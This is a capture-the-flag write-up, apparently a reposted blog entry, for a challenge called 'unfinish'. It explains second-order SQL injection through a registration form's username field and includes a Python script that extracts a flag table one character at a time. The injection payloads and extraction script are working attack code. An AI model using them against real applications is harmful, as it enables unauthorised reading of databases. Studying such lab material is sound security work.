Offensive and defensive world unfinish

Others 2021-03-20 07:12:50 views: null
  • Title description: SQL injection
  • Access is a login page
  • dirsearch scanned it
    Insert picture description here
  • Visit register.php
  • Registered an account to log in, it seems useless to return to the login page
  • But here I thought of an injection method mentioned when I wrote the basics of sql injection but did not study it carefully.
  • 二次注入
  • The point injected here should be in register.phpthe name on the page
  • Because the email and password still need to be used when logging in
  • For details, please see my previous article
    Insert picture description here
  • The single quote registration failed, so I changed the user name to root' and '1here and the registration was successful
  • That is to say, the closing method here should be closed with single quotes and there is no escaping of addslashes() that I learned before.
  • At this time, logged in and the user name is 0
    Insert picture description here
  • So here it is necessarily exist sql injection but I try to register the name for the 1' union select 1,database()#time
  • It also returned one, nnnnoooo!!!!that is, there is still a filter here? ? ? ?
  • So you need to fuzz with burpsuit
    Insert picture description here
  • Filter a lot of things information_schemaare filtered out true I do not know how I did not expect to engage in
  • Helpless wp
  • Attach the script of the boss
import requests
import re


register_url = 'http://111.200.241.244:45701/register.php'
login_url = 'http://111.200.241.244:45701/login.php'


for i in range(1, 100):
    register_data = {
    
    
        'email': '[email protected]%d' % i,
        'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
        'password': 'admin'
    }
    res = requests.post(url=register_url, data=register_data)

    login_data = {
    
    
        'email': '[email protected]%d' % i,
        'password': 'admin'
    }
    res_ = requests.post(url=login_url, data=login_data)
    code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
    print(chr(int(code.group(1))), end='')
  • The following is my own understanding
  • Since it is the user name that can be injected twice and it information_schemais filtered, it is definitely not possible to use union injection.
  • +The role of the mysql medium is to convert characters into numbers and add them
'1' + '1a' # 2
'0' + database() # 0 
'0' + substr(database(),1,1) # 100 则database()的第一个字符的ascii值就为100
  • So the core injection code is
"0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
  • After that, the user name value of the login.php page is obtained through the regularity, which is the ascii code value of each digit of the flag.
  • I want to add my knowledge of mysql. What I learned before is not enough to do the current topic...

Guess you like

Origin blog.csdn.net/CyhDl666/article/details/114098455
Recommended
Ranking
[Algorithm] greedy _ program scheduling issues
Spring 控制反转(IOC)
Data structure-6.6 figure
Indicates that the class or member method has abstract properties
Huawei v5 server installed Linux operating system
Postgresql source code analysis - creating ordinary tables
Chapter 10 Evaluation Classification Results
Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages
Java Exercise 17.1
Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.
Daily
More
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)

Code World

© 2018 codetd.com